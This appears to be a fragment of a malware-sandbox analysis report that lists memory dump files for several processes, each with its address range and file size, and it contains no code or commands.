memory/1084-181-0x00007FFEFD110000-0x00007FFEFD124000-memory.dmpFilesize
80KB
-
memory/1084-127-0x00007FFF120D0000-0x00007FFF120E9000-memory.dmpFilesize
100KB
-
memory/1084-146-0x00007FFF15EA0000-0x00007FFF15EAD000-memory.dmpFilesize
52KB
-
memory/1084-145-0x00007FFF10B90000-0x00007FFF10BA9000-memory.dmpFilesize
100KB
-
memory/1084-280-0x00007FFEFAFF0000-0x00007FFEFB10C000-memory.dmpFilesize
1.1MB
-
memory/1084-276-0x00007FFEF9570000-0x00007FFEF9A99000-memory.dmpFilesize
5.2MB
-
memory/1084-278-0x00007FFF12C10000-0x00007FFF12C1D000-memory.dmpFilesize
52KB
-
memory/1084-115-0x00007FFF12B00000-0x00007FFF12B24000-memory.dmpFilesize
144KB
-
memory/1084-277-0x00007FFEFD110000-0x00007FFEFD124000-memory.dmpFilesize
80KB
-
memory/1084-275-0x00007FFEFB340000-0x00007FFEFB40D000-memory.dmpFilesize
820KB
-
memory/1084-271-0x00007FFEFC450000-0x00007FFEFC5CE000-memory.dmpFilesize
1.5MB
-
memory/1084-274-0x00007FFF106F0000-0x00007FFF10723000-memory.dmpFilesize
204KB
-
memory/1084-93-0x00007FFEFD600000-0x00007FFEFDBF2000-memory.dmpFilesize
5.9MB
-
memory/1084-273-0x00007FFF15EA0000-0x00007FFF15EAD000-memory.dmpFilesize
52KB
-
memory/1084-272-0x00007FFF10B90000-0x00007FFF10BA9000-memory.dmpFilesize
100KB
-
memory/1084-270-0x00007FFF11B50000-0x00007FFF11B73000-memory.dmpFilesize
140KB
-
memory/1084-269-0x00007FFF120D0000-0x00007FFF120E9000-memory.dmpFilesize
100KB
-
memory/1084-265-0x00007FFEFD600000-0x00007FFEFDBF2000-memory.dmpFilesize
5.9MB
-
memory/1084-116-0x00007FFF16930000-0x00007FFF1693F000-memory.dmpFilesize
60KB
-
memory/1084-267-0x00007FFF16930000-0x00007FFF1693F000-memory.dmpFilesize
60KB
-
memory/1084-266-0x00007FFF12B00000-0x00007FFF12B24000-memory.dmpFilesize
144KB
-
memory/1084-129-0x00007FFF11B50000-0x00007FFF11B73000-memory.dmpFilesize
140KB
-
memory/1084-131-0x00007FFEFC450000-0x00007FFEFC5CE000-memory.dmpFilesize
1.5MB
-
memory/1084-147-0x00007FFF106F0000-0x00007FFF10723000-memory.dmpFilesize
204KB
-
memory/1084-156-0x000002E29DF70000-0x000002E29E499000-memory.dmpFilesize
5.2MB
-
memory/1084-155-0x00007FFEF9570000-0x00007FFEF9A99000-memory.dmpFilesize
5.2MB
-
memory/2520-371-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/2520-153-0x00007FFF034F3000-0x00007FFF034F4000-memory.dmpFilesize
4KB
-
memory/2520-178-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/2520-2-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/2520-1-0x0000000000E10000-0x0000000001986000-memory.dmpFilesize
11.5MB
-
memory/2520-0-0x00007FFF034F3000-0x00007FFF034F4000-memory.dmpFilesize
4KB
-
memory/3908-599-0x00007FFF1F1E0000-0x00007FFF1F3BB000-memory.dmpFilesize
1.9MB
-
memory/3908-595-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3908-600-0x00007FFF1CBA0000-0x00007FFF1CC4E000-memory.dmpFilesize
696KB
-
memory/3908-596-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3908-593-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3908-601-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3908-594-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3908-598-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4408-13-0x00000259CB0E0000-0x00000259CB156000-memory.dmpFilesize
472KB
-
memory/4408-9-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/4408-8-0x00000259CABC0000-0x00000259CABE2000-memory.dmpFilesize
136KB
-
memory/4408-7-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/4408-51-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/4408-11-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmpFilesize
9.9MB
-
memory/5548-908-0x000001C85EED0000-0x000001C85EEEC000-memory.dmpFilesize
112KB
-
memory/5548-914-0x000001C877870000-0x000001C877929000-memory.dmpFilesize
740KB
-
memory/5548-947-0x000001C877340000-0x000001C87734A000-memory.dmpFilesize
40KB